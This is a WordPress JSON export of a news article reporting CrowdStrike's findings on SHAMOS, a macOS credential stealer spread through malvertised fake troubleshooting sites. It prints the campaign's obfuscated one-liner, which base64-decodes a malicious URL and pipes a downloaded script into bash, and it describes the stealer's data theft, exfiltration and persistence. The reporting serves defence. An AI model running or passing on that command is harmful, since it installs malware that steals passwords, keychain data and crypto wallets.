{"id":6318,"date":"2025-08-21T10:04:12","date_gmt":"2025-08-21T10:04:12","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/08\/21\/new-shamos-malware-attacking-macos-via-fake-help-websites-to-steal-login-credentials\/"},"modified":"2025-08-21T10:04:12","modified_gmt":"2025-08-21T10:04:12","slug":"new-shamos-malware-attacking-macos-via-fake-help-websites-to-steal-login-credentials","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/08\/21\/new-shamos-malware-attacking-macos-via-fake-help-websites-to-steal-login-credentials\/","title":{"rendered":"New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials"},"content":{"rendered":"<p>    New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites.<\/p>\n<p>The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER who operates this information stealer as malware-as-a-service for rent to other cybercriminals.<\/p>\n<p>The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as \u201cmacos flush resolver cache,\u201d only to encounter promoted malvertising websites in their search results.<\/p>\n<p>These <a href=\"https:\/\/cybersecuritynews.com\/5000-fake-online-pharmacies-websites\/\" target=\"_blank\" rel=\"noreferrer noopener\">fraudulent sites<\/a>, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.<\/p>\n<p>The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.<\/p>\n<p>CrowdStrike researchers <a href=\"https:\/\/www.crowdstrike.com\/en-us\/blog\/falcon-prevents-cookie-spider-shamos-delivery-macos\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.<\/p>\n<p>However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjhsL9zeiEH8FMcReQyDb32yBd56vrxEN_Zg__wTQS-OsiJpRxD719zcSCnVreVvxs50NAhdJa6BEFqOgFtS7znbJpXHxOcMr5bj8Dlf82o9dTruz4TapjhsdaYAa1dy6LFojzd1vkZjBQo9T0OF35N0DRBVbYCA3v4-LQVG27AQcNo0L-x5nssZR-ByV8\/s16000\/Search%2520engine%2520results%2520with%2520promoted%2520malvertising%2520website%2520%28Source%2520-%2520CrowdStrike%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Search engine results with promoted malvertising website (Source \u2013 CrowdStrike)<\/figcaption><\/figure>\n<\/div>\n<p>The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity <a href=\"https:\/\/cybersecuritynews.com\/microsoft-office-spoofing-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">spoofing<\/a> techniques.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjEUlqjuOc4oxxuScmfAFK6bfbdwH6DQnf2rFyg5_-K_GUTq2HSxLqA7sr8FaiYZn-IZJZ2ot0OkL5kyBLvJmDeRpb6IhuoclRLiBfFCJyEBOhbYxIjk15lTuRlLWLtxN5K8hqhdwqA3DDWdOPRmaQx8ED8FkMR9uqowP56tfx7qXEeZ3Tttjx4k8Zf17U\/s16000\/Google%2520advertising%2520profile%2520%28Source%2520-%2520CrowdStrike%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Google advertising profile (Source \u2013 CrowdStrike)<\/figcaption><\/figure>\n<\/div>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-and-technical-implementation\"><strong>Infection Mechanism and Technical Implementation<\/strong><\/h2>\n<p>The malware\u2019s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:-<\/p>\n<pre class=\"wp-block-code\"><code>\"curl -fsSL\" $ (\"echo\" \"aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo\" | \"base64 -d\") | \"bash\"<\/code><\/pre>\n<p>This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https:\/\/icloudservers.com\/gm\/install[.]sh, then downloads and executes a Bash script from this malicious server.<\/p>\n<p>The script captures the user\u2019s password and subsequently downloads the SHAMOS Mach-O executable from https:\/\/icloudservers.com\/gm\/update.<\/p>\n<p>Once installed in the \/tmp\/ directory, SHAMOS employs multiple evasion techniques to avoid detection.<\/p>\n<p>The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.<\/p>\n<p>The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.<\/p>\n<p>SHAMOS specifically targets <a href=\"https:\/\/cybersecuritynews.com\/cryptocore-cryptocurrency-scam-draining-wallets\/\" target=\"_blank\" rel=\"noreferrer noopener\">cryptocurrency wallet<\/a> files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.<\/p>\n<p>The malware packages stolen data into a ZIP archive named \u201cout.zip\u201d and exfiltrates it using curl commands to remote servers.<\/p>\n<p>Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User\u2019s LaunchDaemons directory when sudo privileges are available.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)\"><strong><code>Boost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0<a href=\"https:\/\/intelligence.any.run\/plans\/?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=alert_fatigue&amp;utm_content=lookup_plan&amp;utm_term=120825\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-shamos-malware-attacking-macos\/\">New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/new-shamos-malware-attacking-macos\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites. The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-6318","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6318"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=6318"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6318\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=6318"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=6318"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=6318"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}